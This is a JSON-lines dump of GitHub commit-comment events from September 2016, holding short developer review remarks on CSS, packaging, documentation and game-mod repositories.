{"id":"4518502111","type":"CommitCommentEvent","actor":{"login":"danluu"},"repo":{"name":"BitFunnel/NativeJIT"},"payload":{"comment":{"id":18904072,"position":88,"line":109,"path":"Documentation/README.md","commit_id":"faf2a7f30098f4c36356291023e172caaf1d5645","created_at":"2016-09-05T22:36:14Z","updated_at":"2016-09-05T22:36:14Z","body":"Thanks for catching this. We have newer documentation that makes it more clear that we're trying to calculate `p1 * p1` and forgot to get rid of this now obsolete file. This is fixed in cae0399837354af9a91221481c96bb76c728901b."}},"created_at":"2016-09-05T22:36:14Z"}
{"id":"4518506100","type":"CommitCommentEvent","actor":{"login":"mattdrose"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18904076,"position":9,"line":24,"path":"objects/_pagination.scss","commit_id":"6f399518ced70e07f3d2ba674f5f75e34d1ec4af","created_at":"2016-09-05T22:38:44Z","updated_at":"2016-09-05T22:38:44Z","body":"This change may add unwanted spacing on certain browsers. Have you tested? https://martinwolf.org/blog/2013/06/fixing-display-inline-block"}},"created_at":"2016-09-05T22:38:44Z"}
{"id":"4518506197","type":"CommitCommentEvent","actor":{"login":"havardgulldahl"},"repo":{"name":"havardgulldahl/jottalib"},"payload":{"comment":{"id":18904077,"position":null,"line":null,"path":null,"commit_id":"a02c6ee173df09cb0ddc05e65360f0950b723756","created_at":"2016-09-05T22:38:48Z","updated_at":"2016-09-05T22:38:48Z","body":"@jkaberg Do you remember why you needed this change? What is/was your version of `duplicity`?"}},"created_at":"2016-09-05T22:38:48Z"}
{"id":"4518507188","type":"CommitCommentEvent","actor":{"login":"tchapi"},"repo":{"name":"Sylius/Sylius"},"payload":{"comment":{"id":18904079,"position":null,"line":null,"path":null,"commit_id":"e30c4d433c6694d2f3282c14d7ee6c185a526c15","created_at":"2016-09-05T22:39:25Z","updated_at":"2016-09-05T22:39:25Z","body":"\\o/"}},"created_at":"2016-09-05T22:39:25Z"}
{"id":"4518508006","type":"CommitCommentEvent","actor":{"login":"lujun9972"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18904081,"position":null,"line":null,"path":null,"commit_id":"bcf9f9abca0aa458ba018e0914112b4ec450ce82","created_at":"2016-09-05T22:39:54Z","updated_at":"2016-09-05T22:39:54Z","body":"Would you like to be collaborator?"}},"created_at":"2016-09-05T22:39:54Z"}
{"id":"4518510748","type":"CommitCommentEvent","actor":{"login":"williewillus"},"repo":{"name":"Vazkii/BotaniaV2"},"payload":{"comment":{"id":18904083,"position":null,"line":null,"path":null,"commit_id":"e7753d0a79befdc471fe34394d6e298000c890c2","created_at":"2016-09-05T22:41:31Z","updated_at":"2016-09-05T22:41:31Z","body":"all the compile errors :D "}},"created_at":"2016-09-05T22:41:31Z"}
{"id":"4518510904","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18904085,"position":null,"line":null,"path":null,"commit_id":"4a44e46ae276aeac75c1126725627dbf059fd585","created_at":"2016-09-05T22:41:37Z","updated_at":"2016-09-05T22:41:37Z","body":"Related to: backdrop/backdrop-issues#2124 "}},"created_at":"2016-09-05T22:41:37Z"}
{"id":"4518511375","type":"CommitCommentEvent","actor":{"login":"mattdrose"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18904089,"position":null,"line":null,"path":null,"commit_id":"5a2ac56dbe58a656691873ef89c6f8e3692e0bdf","created_at":"2016-09-05T22:41:52Z","updated_at":"2016-09-05T22:41:52Z","body":"What's the benefit of using `@include border(#D6D6D6, 1px, \"bottom\");` instead of `border-bottom: 1px solid #D6D6D6;`?"}},"created_at":"2016-09-05T22:41:52Z"}
{"id":"4518514080","type":"CommitCommentEvent","actor":{"login":"odavila"},"repo":{"name":"odavila/git-dir_repo"},"payload":{"comment":{"id":18904093,"position":null,"line":null,"path":null,"commit_id":"106bcef0171ac218f7a97ca2a35ea7a5d4361eea","created_at":"2016-09-05T22:43:28Z","updated_at":"2016-09-05T22:43:28Z","body":"\r\n![1-quadratic 5 00 24 pm](https://cloud.githubusercontent.com/assets/9037985/18257813/03dd5a1c-7398-11e6-9dc6-f5c59bd7637b.png)\r\n![2-quadratic 4 58 32 pm](https://cloud.githubusercontent.com/assets/9037985/18257816/10a9af5c-7398-11e6-81eb-710cf5263c25.png)\r\n![3-quadratic 4 54 28 pm](https://cloud.githubusercontent.com/assets/9037985/18257820/13f4dd3a-7398-11e6-9b72-e1bca676b7ac.png)\r\n![4-quadtatic 5 01 53 pm](https://cloud.githubusercontent.com/assets/9037985/18257822/16ef8f62-7398-11e6-93f7-6de8705a2d73.png)\r\n"}},"created_at":"2016-09-05T22:43:28Z"}
{"id":"4518519045","type":"CommitCommentEvent","actor":{"login":"jbandersnatchi"},"repo":{"name":"jbandersnatchi/ProgrammingAssignment2"},"payload":{"comment":{"id":18904095,"position":null,"line":null,"path":null,"commit_id":"aa029c858a07f7f16436252fcf44a818a9398078","created_at":"2016-09-05T22:46:33Z","updated_at":"2016-09-05T22:46:33Z","body":"Updated file created"}},"created_at":"2016-09-05T22:46:33Z"}
{"id":"4518520349","type":"CommitCommentEvent","actor":{"login":"luccioman"},"repo":{"name":"yacy/yacy_search_server"},"payload":{"comment":{"id":18904098,"position":null,"line":null,"path":null,"commit_id":"a9527877121e6445095e9a68946658cd56043bc7","created_at":"2016-09-05T22:47:20Z","updated_at":"2016-09-05T22:47:20Z","body":"Hello @reger24 unfortunately the problem described in mantis 679 (http://mantis.tokeek.de/view.php?id=679) is still an issue when the configured language is other than English. \r\nThis is still caused by an inconsistency between opensearch link title in the search page (internationalized) and the Short Name is the opensearchdescription.xml (always in English).\r\nWe could internationalize the Short Name in the xml description, but don't you think it would be more reliable to have a generic name (not internationalized) for the both (Especially when considering that language can now be configured as \"browser\" defined)?"}},"created_at":"2016-09-05T22:47:20Z"}
{"id":"4518520378","type":"CommitCommentEvent","actor":{"login":"granitepenguin"},"repo":{"name":"wwivbbs/wwiv"},"payload":{"comment":{"id":18904099,"position":null,"line":null,"path":null,"commit_id":"083aa3b74df57b5da2f8a7008fa11824ca3513c0","created_at":"2016-09-05T22:47:21Z","updated_at":"2016-09-05T22:47:21Z","body":"SGTM"}},"created_at":"2016-09-05T22:47:21Z"}
{"id":"4518520835","type":"CommitCommentEvent","actor":{"login":"tomitrescak"},"repo":{"name":"wallabyjs/walllaby-typescript-powerassert"},"payload":{"comment":{"id":18904100,"position":null,"line":null,"path":null,"commit_id":"24535fa32bc687327e82f7ee8a9485f5fba9bd4e","created_at":"2016-09-05T22:47:39Z","updated_at":"2016-09-05T22:47:39Z","body":"Why have you decided to use empower instead of babel? I have a bit issue setting empower with react. "}},"created_at":"2016-09-05T22:47:39Z"}
{"id":"4518521464","type":"CommitCommentEvent","actor":{"login":"mattdrose"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18904103,"position":null,"line":null,"path":null,"commit_id":"f9860cbeae0b143796a121527bd3d202e1799325","created_at":"2016-09-05T22:48:03Z","updated_at":"2016-09-05T22:48:03Z","body":"Nice. Moves the codebase closer to goal that all colours should use variables 👍 . The only one that might be weird is the code blocks. Depending on what value is set for border colour, it could look weird, since the other colours aren't using variables. \r\n\r\nCode blocks are kind of finicky to make look good. Might be worth making a map to set all the _code.scss variables."}},"created_at":"2016-09-05T22:48:03Z"}
{"id":"4518522522","type":"CommitCommentEvent","actor":{"login":"Yaser7440"},"repo":{"name":"nkvoronov/skin.estuary-jarvis"},"payload":{"comment":{"id":18904104,"position":null,"line":null,"path":null,"commit_id":"a6499e04442459758ab60f082acd1cd123bf8304","created_at":"2016-09-05T22:48:43Z","updated_at":"2016-09-05T22:48:43Z","body":"Thank you for the great work, And could you please help me with the **widgets** it is not working for me."}},"created_at":"2016-09-05T22:48:43Z"}
{"id":"4518529436","type":"CommitCommentEvent","actor":{"login":"sebas3986"},"repo":{"name":"sebas3986/sebas3986.github.io"},"payload":{"comment":{"id":18904119,"position":2,"line":2,"path":"index.html","commit_id":"e591f78cee0122251df025d44758ecd6d6b440dc","created_at":"2016-09-05T22:53:11Z","updated_at":"2016-09-05T22:53:11Z","body":"{"}},"created_at":"2016-09-05T22:53:11Z"}
{"id":"4518529629","type":"CommitCommentEvent","actor":{"login":"nicketa96"},"repo":{"name":"nicketa96/nick"},"payload":{"comment":{"id":18904120,"position":null,"line":null,"path":null,"commit_id":"e59271fc1e47a72cc36d429181ae0228f8fe1989","created_at":"2016-09-05T22:53:20Z","updated_at":"2016-09-05T22:53:20Z","body":"ni"}},"created_at":"2016-09-05T22:53:20Z"}
{"id":"4518530365","type":"CommitCommentEvent","actor":{"login":"yann300"},"repo":{"name":"flyswatter/remix"},"payload":{"comment":{"id":18904122,"position":7,"line":7,"path":"src/helpers/init.js","commit_id":"c9bd43cb2e3309acb53b6351daabafab8d66aa18","created_at":"2016-09-05T22:53:48Z","updated_at":"2016-09-05T22:53:48Z","body":"some remix modules can be used outside of the browser. so maybe we should not put this here.\r\nhow do you plan to use remix in metamask? inside an iframe or fully integrated in the app?\r\nin the last case, it is possible to set by code the web3: https://github.com/ethereum/remix/blob/master/index.html"}},"created_at":"2016-09-05T22:53:48Z"}
{"id":"4518532730","type":"CommitCommentEvent","actor":{"login":"williewillus"},"repo":{"name":"Vazkii/BotaniaV2"},"payload":{"comment":{"id":18904123,"position":null,"line":null,"path":null,"commit_id":"c6f9103b31196fd6e55f01254a0f48800f8442c8","created_at":"2016-09-05T22:55:15Z","updated_at":"2016-09-05T22:55:15Z","body":"when are these mappings from, last year? 0.o \r\n\r\nthe ones i used were already outdated at their time lol"}},"created_at":"2016-09-05T22:55:15Z"}
{"id":"4518537491","type":"CommitCommentEvent","actor":{"login":"emk"},"repo":{"name":"faradayio/conductor"},"payload":{"comment":{"id":18904125,"position":null,"line":null,"path":null,"commit_id":"d7bbf769d759597e1254c161b07a8e6c21711582","created_at":"2016-09-05T22:58:01Z","updated_at":"2016-09-05T22:58:01Z","body":"I'm in transit right now but I'd be happy to take a look tomorrow. Our\nmaybe this evening if we line up.\n\nLe 5 sept. 2016 6:49 PM, \"Derek Kastner\" <notifications@github.com> a\nécrit :\n\n> WIP `new` command\n>\n> @emk getting some really weird compilation errors, would love to chat\n> about them\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/faradayio/conductor/commit/\n> d7bbf769d759597e1254c161b07a8e6c21711582\n>\n"}},"created_at":"2016-09-05T22:58:01Z"}
{"id":"4518537531","type":"CommitCommentEvent","actor":{"login":"flyswatter"},"repo":{"name":"flyswatter/remix"},"payload":{"comment":{"id":18904126,"position":7,"line":7,"path":"src/helpers/init.js","commit_id":"c9bd43cb2e3309acb53b6351daabafab8d66aa18","created_at":"2016-09-05T22:58:04Z","updated_at":"2016-09-05T22:58:04Z","body":"Oh I had only been thinking of remix as a singular web dapp, hadn't considered integrating it into metamask (at this point at least).\r\n\r\nThis branch was aimed at loading [the remix sample site](http://ethereum.github.io/remix/) so that if you have metamask running, you don't need a local node running.\r\n\r\nI think lots of functionality that might otherwise \"be integrated into\" metamask, is actually better left in webpages that use metamask's provider instead.\r\n\r\nAnyways, we've had some rare cases where web3 checking before document load results in no web3, we believe this is actually a Chrome bug, but there's not really a better workaround.\r\n\r\nOpen to putting a delay on the web3 check anywhere, if this is internal to the module, maybe the module itself should be loaded after the `load` event instead."}},"created_at":"2016-09-05T22:58:04Z"}
{"id":"4518539962","type":"CommitCommentEvent","actor":{"login":"Martinsos"},"repo":{"name":"kabuhr/edlib"},"payload":{"comment":{"id":18904129,"position":1,"line":1,"path":"contrib/haskell/.gitignore","commit_id":"875c51d3eb5e9420c3adcddc1bf15eb3193d8097","created_at":"2016-09-05T22:59:29Z","updated_at":"2016-09-05T22:59:29Z","body":"Wow this is really cool, you wrote a binding for Haskell!\r\nI am actually a big fan of Haskell and functional programming - I studied it for a year and used it for some time at college, however I got to using it in practice (and my knowledge is still closer to beginner than advanced).\r\nWhat is the motivation behind doing so, do you think it will be useful in Haskell?"}},"created_at":"2016-09-05T22:59:29Z"}
{"id":"4518540832","type":"CommitCommentEvent","actor":{"login":"granitepenguin"},"repo":{"name":"wwivbbs/wwiv"},"payload":{"comment":{"id":18904131,"position":null,"line":null,"path":null,"commit_id":"8f474e3ca5e8266fb6867f995cf00dc819e2fb14","created_at":"2016-09-05T23:00:00Z","updated_at":"2016-09-05T23:00:00Z","body":"Looks like this applies to all binaries.. perfect. :-)"}},"created_at":"2016-09-05T23:00:00Z"}
{"id":"4518542447","type":"CommitCommentEvent","actor":{"login":"draobrehtom"},"repo":{"name":"draobrehtom/dxlibmta"},"payload":{"comment":{"id":18904133,"position":48,"line":55,"path":"elements/windows.lua","commit_id":"5ee6426ecd9a3467dfb0bb7673983ed85070ff23","created_at":"2016-09-05T23:00:51Z","updated_at":"2016-09-05T23:00:51Z","body":"Need to develop algorithm moving windows and children elements."}},"created_at":"2016-09-05T23:00:51Z"}
{"id":"4518549255","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18904138,"position":null,"line":null,"path":null,"commit_id":"6df33afd5e3adf03e5dbcaf4088e8a952f3640a0","created_at":"2016-09-05T23:04:57Z","updated_at":"2016-09-05T23:04:57Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cTJ8XtXHRt6Caepayc4dMg"}},"created_at":"2016-09-05T23:04:57Z"}
{"id":"4518551123","type":"CommitCommentEvent","actor":{"login":"FirebirdTA01"},"repo":{"name":"FirebirdTA01/vita-headers"},"payload":{"comment":{"id":18904141,"position":null,"line":null,"path":null,"commit_id":"d50079a711ab8f08d6636b8426ad52141c03d30c","created_at":"2016-09-05T23:06:09Z","updated_at":"2016-09-05T23:06:09Z","body":"Added void pointer to host memory and unsigned int hostMemSize to SceGxmRenderTargetParams, needed by SceGxmGetRenderTargetMemSizes() and SceGxmRenderTargetGetHostMem()"}},"created_at":"2016-09-05T23:06:09Z"}
{"id":"4518554976","type":"CommitCommentEvent","actor":{"login":"klickverbot"},"repo":{"name":"JohanEngelen/ldc"},"payload":{"comment":{"id":18904144,"position":4,"line":202,"path":"gen/funcgenstate.h","commit_id":"deb636318cac82a8051e17eecc5a7fa11fa3c006","created_at":"2016-09-05T23:08:37Z","updated_at":"2016-09-05T23:08:37Z","body":"Could you make this a bit more precise? As far as I can see, this is about the implicit va_list for D-style variadics."}},"created_at":"2016-09-05T23:08:37Z"}
{"id":"4518559302","type":"CommitCommentEvent","actor":{"login":"hzhou81"},"repo":{"name":"hzhou81/xinu"},"payload":{"comment":{"id":18904147,"position":null,"line":null,"path":null,"commit_id":"6ad6ab6e011e4bef1c2a07f67175925daedff609","created_at":"2016-09-05T23:11:25Z","updated_at":"2016-09-05T23:11:25Z","body":"Previous GCC check return error when gcc is already installed on host machine, so fix the bug.\r\nI also add -g switch when compile xinu in order to debug xinu on my eclipse."}},"created_at":"2016-09-05T23:11:25Z"}
{"id":"4518559880","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18904148,"position":null,"line":null,"path":null,"commit_id":"429ff9a061ea846e24647a4527be04507de878bc","created_at":"2016-09-05T23:11:48Z","updated_at":"2016-09-05T23:11:48Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#bIUA9toNRqieUB-32KlAZQ"}},"created_at":"2016-09-05T23:11:48Z"}
{"id":"4518559906","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"cyberblast/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18904149,"position":null,"line":null,"path":null,"commit_id":"3b11e8e47c7bf0455eac474519f75c28d5901f2a","created_at":"2016-09-05T23:11:48Z","updated_at":"2016-09-05T23:11:48Z","body":"well energy is for enemy spawn. not sure for another building types"}},"created_at":"2016-09-05T23:11:48Z"}
{"id":"4518566060","type":"CommitCommentEvent","actor":{"login":"jwandrews"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18904157,"position":null,"line":null,"path":null,"commit_id":"5a2ac56dbe58a656691873ef89c6f8e3692e0bdf","created_at":"2016-09-05T23:15:36Z","updated_at":"2016-09-05T23:15:36Z","body":"My initial thought was that you wouldn't have to be this verbose. Meaning: \"@include border()\" and it would default to 1px and all sides with the border-color default. \n\nMost borders you would use generally are the same width and colour with only the position being the most varying argument/property. So maybe it may be beneficial for the position argument to be first in the mixin so that the mixin can be used as so, \"@include border('bottom')\"."}},"created_at":"2016-09-05T23:15:36Z"}
{"id":"4518568980","type":"CommitCommentEvent","actor":{"login":"jwandrews"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18904160,"position":null,"line":null,"path":null,"commit_id":"f9860cbeae0b143796a121527bd3d202e1799325","created_at":"2016-09-05T23:17:26Z","updated_at":"2016-09-05T23:17:26Z","body":"I've been planning to implement your use of maps from the 2.0 branch for code blocks. Planned for v1.3"}},"created_at":"2016-09-05T23:17:26Z"}
{"id":"4518571246","type":"CommitCommentEvent","actor":{"login":"ArtemGovorov"},"repo":{"name":"wallabyjs/walllaby-typescript-powerassert"},"payload":{"comment":{"id":18904165,"position":null,"line":null,"path":null,"commit_id":"24535fa32bc687327e82f7ee8a9485f5fba9bd4e","created_at":"2016-09-05T23:18:50Z","updated_at":"2016-09-05T23:18:50Z","body":"@tomitrescak It's just to demonstrate that using babel is optional. Some projects may use TypeScript or anything else without babel, and still should be able to use `power-assert`, without having to depend on babel just for the sake of using the assertion lib."}},"created_at":"2016-09-05T23:18:50Z"}
{"id":"4518576984","type":"CommitCommentEvent","actor":{"login":"Oxicode"},"repo":{"name":"ngfw/Recipe"},"payload":{"comment":{"id":18904174,"position":null,"line":null,"path":null,"commit_id":"89507ab679caa5cbe0fcdc10debd6048da79293a","created_at":"2016-09-05T23:22:19Z","updated_at":"2016-09-05T23:22:19Z","body":"+1"}},"created_at":"2016-09-05T23:22:19Z"}
{"id":"4518582687","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"Tr4sHCr4fT/pickymap"},"payload":{"comment":{"id":18904182,"position":5,"line":37,"path":"tracker.py","commit_id":"a2d8eb6942946b43150fcc4960a00506c270bee1","created_at":"2016-09-05T23:25:56Z","updated_at":"2016-09-05T23:25:56Z","body":"That default setting is effectively making it so, that the layers setting from the file will always be ignored."}},"created_at":"2016-09-05T23:25:56Z"}
{"id":"4518586567","type":"CommitCommentEvent","actor":{"login":"glikar"},"repo":{"name":"Nyr/openvpn-install"},"payload":{"comment":{"id":18904190,"position":null,"line":null,"path":null,"commit_id":"56f079289e8f5236ec9dc08a5331d90835b3fd0c","created_at":"2016-09-05T23:28:24Z","updated_at":"2016-09-05T23:28:24Z","body":"Sweet!!"}},"created_at":"2016-09-05T23:28:24Z"}
{"id":"4518588055","type":"CommitCommentEvent","actor":{"login":"FileDotZip"},"repo":{"name":"Barteks2x/maven-repo"},"payload":{"comment":{"id":18904196,"position":null,"line":null,"path":null,"commit_id":"3405c874cc77eb6877f0a9b931df4e03468e3bbb","created_at":"2016-09-05T23:29:20Z","updated_at":"2016-09-05T23:29:20Z","body":"Where did you go?"}},"created_at":"2016-09-05T23:29:20Z"}
{"id":"4518588739","type":"CommitCommentEvent","actor":{"login":"ginajimenezc"},"repo":{"name":"ginajimenezc/Curriculum-Vitae"},"payload":{"comment":{"id":18904197,"position":2,"line":2,"path":"README.md","commit_id":"2114898e10f647f3205e40a069a20a2fe2fce9f9","created_at":"2016-09-05T23:29:43Z","updated_at":"2016-09-05T23:29:43Z","body":"+# teléfono móvil 3217709893"}},"created_at":"2016-09-05T23:29:43Z"}
{"id":"4518595923","type":"CommitCommentEvent","actor":{"login":"mbiebl"},"repo":{"name":"formorer/pkg-conntrack-tools"},"payload":{"comment":{"id":18904207,"position":null,"line":null,"path":null,"commit_id":"302840a6d01e58871e1e238484d3f37cceb7ad03","created_at":"2016-09-05T23:34:27Z","updated_at":"2016-09-05T23:34:27Z","body":"Just a small comment here: in the future you might want to use dh_installdeb's support for .maintscript files for cleaning up / moving conffiles.\r\nSee man \"dh_installdeb\" → .maintscript"}},"created_at":"2016-09-05T23:34:27Z"}
{"id":"4518597956","type":"CommitCommentEvent","actor":{"login":"daison12006013"},"repo":{"name":"phalconslayer/framework"},"payload":{"comment":{"id":18904209,"position":7,"line":55,"path":"src/Clarity/Console/Script/RunCommand.php","commit_id":"f15d73f9687ef877573cdfdba5a2df6c8dd433b3","created_at":"2016-09-05T23:35:43Z","updated_at":"2016-09-05T23:35:43Z","body":"Omg, thanks buddy, "}},"created_at":"2016-09-05T23:35:43Z"}
{"id":"4518598692","type":"CommitCommentEvent","actor":{"login":"mbiebl"},"repo":{"name":"formorer/pkg-conntrack-tools"},"payload":{"comment":{"id":18904211,"position":27,"line":19,"path":"debian/conntrackd.README.Debian","commit_id":"8de1906f4dfca6500dd42ed567fb93973ec7643d","created_at":"2016-09-05T23:36:12Z","updated_at":"2016-09-05T23:36:12Z","body":"customize"}},"created_at":"2016-09-05T23:36:12Z"}
{"id":"4518600654","type":"CommitCommentEvent","actor":{"login":"mbiebl"},"repo":{"name":"formorer/pkg-conntrack-tools"},"payload":{"comment":{"id":18904214,"position":29,"line":21,"path":"debian/conntrackd.README.Debian","commit_id":"8de1906f4dfca6500dd42ed567fb93973ec7643d","created_at":"2016-09-05T23:37:28Z","updated_at":"2016-09-05T23:37:28Z","body":"You might want to suggest the systemd drop-in mechanism here, or simply recommend the use of systemctl edit <foo>\r\nhttps://www.freedesktop.org/software/systemd/man/systemctl.html#edit%20NAME...\r\n"}},"created_at":"2016-09-05T23:37:28Z"}
{"id":"4518603111","type":"CommitCommentEvent","actor":{"login":"mbiebl"},"repo":{"name":"formorer/pkg-conntrack-tools"},"payload":{"comment":{"id":18904218,"position":26,"line":18,"path":"debian/conntrackd.README.Debian","commit_id":"8de1906f4dfca6500dd42ed567fb93973ec7643d","created_at":"2016-09-05T23:38:55Z","updated_at":"2016-09-05T23:38:55Z","body":"customize"}},"created_at":"2016-09-05T23:38:55Z"}
{"id":"4518623328","type":"CommitCommentEvent","actor":{"login":"wzmli"},"repo":{"name":"wzmli/hybrid"},"payload":{"comment":{"id":18904237,"position":null,"line":null,"path":null,"commit_id":"06e0c1b80f8a024a5ded13783e424de74bf01a7f","created_at":"2016-09-05T23:51:50Z","updated_at":"2016-09-05T23:51:50Z","body":"Only jags has the _inverting_ problem. Remove jags in \"mcmcs\" and only run \"nimble\" and \"nimble_slice\" will work."}},"created_at":"2016-09-05T23:51:50Z"}
{"id":"4518623947","type":"CommitCommentEvent","actor":{"login":"YaroslavZhabko"},"repo":{"name":"BannZay/WorldOfMiniTanks"},"payload":{"comment":{"id":18904239,"position":23,"line":22,"path":"WorldOfMiniTanks/WorldOfMiniTanks/Basics/DrawableComponent.cs","commit_id":"9e6061392956db8cca8948d24fc1b4c797b05d34","created_at":"2016-09-05T23:52:14Z","updated_at":"2016-09-05T23:52:14Z","body":"Please, never commit commented parts of code"}},"created_at":"2016-09-05T23:52:14Z"}
{"id":"4518624988","type":"CommitCommentEvent","actor":{"login":"freiheit"},"repo":{"name":"4yn/discord_rss_bot"},"payload":{"comment":{"id":18904241,"position":null,"line":null,"path":null,"commit_id":"a77333be015e53675e95a95d376e530c144d2235","created_at":"2016-09-05T23:52:55Z","updated_at":"2016-09-05T23:52:55Z","body":"Oooh!\r\n\r\nDoes this implement part of what I was after for https://github.com/freiheit/discord_rss_bot/issues/11"}},"created_at":"2016-09-05T23:52:55Z"}
{"id":"4518625233","type":"CommitCommentEvent","actor":{"login":"YaroslavZhabko"},"repo":{"name":"BannZay/WorldOfMiniTanks"},"payload":{"comment":{"id":18904242,"position":30,"line":30,"path":"WorldOfMiniTanks/WorldOfMiniTanks/Basics/RDrawableComponent.cs","commit_id":"9e6061392956db8cca8948d24fc1b4c797b05d34","created_at":"2016-09-05T23:53:04Z","updated_at":"2016-09-05T23:53:04Z","body":"Not need this comment =)"}},"created_at":"2016-09-05T23:53:04Z"}
{"id":"4518626293","type":"CommitCommentEvent","actor":{"login":"lurch"},"repo":{"name":"RPi-Distro/python-gpiozero"},"payload":{"comment":{"id":18904244,"position":65,"line":576,"path":"gpiozero/pins/data.py","commit_id":"6cc308e44a987db1cc3e038b07627add91e1c5ad","created_at":"2016-09-05T23:53:37Z","updated_at":"2016-09-05T23:53:37Z","body":"https://github.com/RPi-Distro/python-gpiozero/commit/6f67a973cf2124b06bc37db383206ec754ba8ebe\r\n;-)\r\n\r\nAlthough note that when run on a Pi Zero in reality, the 'info' will be gleaned from the `PI_REVISIONS` dict, and the code won't get as far as the `_parse_pi_revision` function. (which makes me wonder why @waveform80 went to all the effort of adding these `if pcb_revision == '1.0'` checks in the first place?"}},"created_at":"2016-09-05T23:53:37Z"}
{"id":"4518629338","type":"CommitCommentEvent","actor":{"login":"YaroslavZhabko"},"repo":{"name":"BannZay/WorldOfMiniTanks"},"payload":{"comment":{"id":18904249,"position":107,"line":95,"path":"WorldOfMiniTanks/WorldOfMiniTanks/Basics/RDrawableComponent.cs","commit_id":"f6c06d77f4b9713e7ba31fb7615dc2e1a7a27151","created_at":"2016-09-05T23:55:35Z","updated_at":"2016-09-05T23:55:35Z","body":"it's bad style, please always use blocs `{}` "}},"created_at":"2016-09-05T23:55:35Z"}
{"id":"4518631079","type":"CommitCommentEvent","actor":{"login":"YaroslavZhabko"},"repo":{"name":"BannZay/WorldOfMiniTanks"},"payload":{"comment":{"id":18904253,"position":11,"line":17,"path":"WorldOfMiniTanks/WorldOfMiniTanks/Tanks/Tank.cs","commit_id":"f6c06d77f4b9713e7ba31fb7615dc2e1a7a27151","created_at":"2016-09-05T23:56:46Z","updated_at":"2016-09-05T23:56:46Z","body":"I agree ))) "}},"created_at":"2016-09-05T23:56:46Z"}
{"id":"4518631264","type":"CommitCommentEvent","actor":{"login":"rossipedia"},"repo":{"name":"NFig/NFig"},"payload":{"comment":{"id":18904254,"position":null,"line":null,"path":null,"commit_id":"5354020f121d2bd9bb2f0ca9ef6357d2773ee7b3","created_at":"2016-09-05T23:56:53Z","updated_at":"2016-09-05T23:56:53Z","body":"I did not realize that. I'll put this on hold for now then."}},"created_at":"2016-09-05T23:56:53Z"}
{"id":"4518631331","type":"CommitCommentEvent","actor":{"login":"vpzomtrrfrt"},"repo":{"name":"Vazkii/BotaniaV2"},"payload":{"comment":{"id":18904255,"position":null,"line":null,"path":null,"commit_id":"dd92eaf8860c54851ad4a45072411f87eda6628f","created_at":"2016-09-05T23:56:55Z","updated_at":"2016-09-05T23:56:55Z","body":"Oooooh!"}},"created_at":"2016-09-05T23:56:55Z"}
{"id":"4518632522","type":"CommitCommentEvent","actor":{"login":"CreeperSeth"},"repo":{"name":"UnraveledMC-Dev/UnraveledMCMod"},"payload":{"comment":{"id":18904257,"position":null,"line":null,"path":null,"commit_id":"3787853e0b3f51d81421999cb7ee6fb22413b6b5","created_at":"2016-09-05T23:57:42Z","updated_at":"2016-09-05T23:57:42Z","body":"No no hell no this completely fucked over my system"}},"created_at":"2016-09-05T23:57:42Z"}
{"id":"4518633978","type":"CommitCommentEvent","actor":{"login":"tarunchhabra26"},"repo":{"name":"txt/ase16"},"payload":{"comment":{"id":18904258,"position":18,"line":18,"path":"doc/hw3.md","commit_id":"1b269cb3e11c51993b76bae57c5be1e2c89220fc","created_at":"2016-09-05T23:58:42Z","updated_at":"2016-09-05T23:58:42Z","body":"Seems it should be chapters 10 - 18"}},"created_at":"2016-09-05T23:58:42Z"}
{"id":"4518634899","type":"CommitCommentEvent","actor":{"login":"chekun"},"repo":{"name":"chekun/AppStore"},"payload":{"comment":{"id":18904260,"position":null,"line":null,"path":null,"commit_id":"9a179e61663862f8782f5da9bb5cfe473888f1ce","created_at":"2016-09-05T23:59:22Z","updated_at":"2016-09-05T23:59:22Z","body":"@cloudse 恢复了，多谢。"}},"created_at":"2016-09-05T23:59:22Z"}
{"id":"4514892698","type":"CommitCommentEvent","actor":{"login":"lueimg"},"repo":{"name":"ISAMARC/documentario"},"payload":{"comment":{"id":18895069,"position":19,"line":19,"path":"public/features/zones/zoneSvc.js","commit_id":"3a4258f90714837fc642c727940428fbabb0eb00","created_at":"2016-09-05T03:00:05Z","updated_at":"2016-09-05T03:00:05Z","body":"@ISAMARC/owners you can do that if you can work with Classes :D"}},"created_at":"2016-09-05T03:00:05Z"}
{"id":"4514894337","type":"CommitCommentEvent","actor":{"login":"lueimg"},"repo":{"name":"ISAMARC/documentario"},"payload":{"comment":{"id":18895072,"position":74,"line":501,"path":"server/features/zonesService.js","commit_id":"3a4258f90714837fc642c727940428fbabb0eb00","created_at":"2016-09-05T03:00:49Z","updated_at":"2016-09-05T03:00:49Z","body":"@ISAMARC/owners the problem was I was sending results: {code: .... } xD "}},"created_at":"2016-09-05T03:00:49Z"}
{"id":"4514894907","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18895075,"position":null,"line":null,"path":null,"commit_id":"4832cd32a538430b3f2cced9a7469ee7730d955a","created_at":"2016-09-05T03:01:08Z","updated_at":"2016-09-05T03:01:08Z","body":"It happened!"}},"created_at":"2016-09-05T03:01:08Z"}
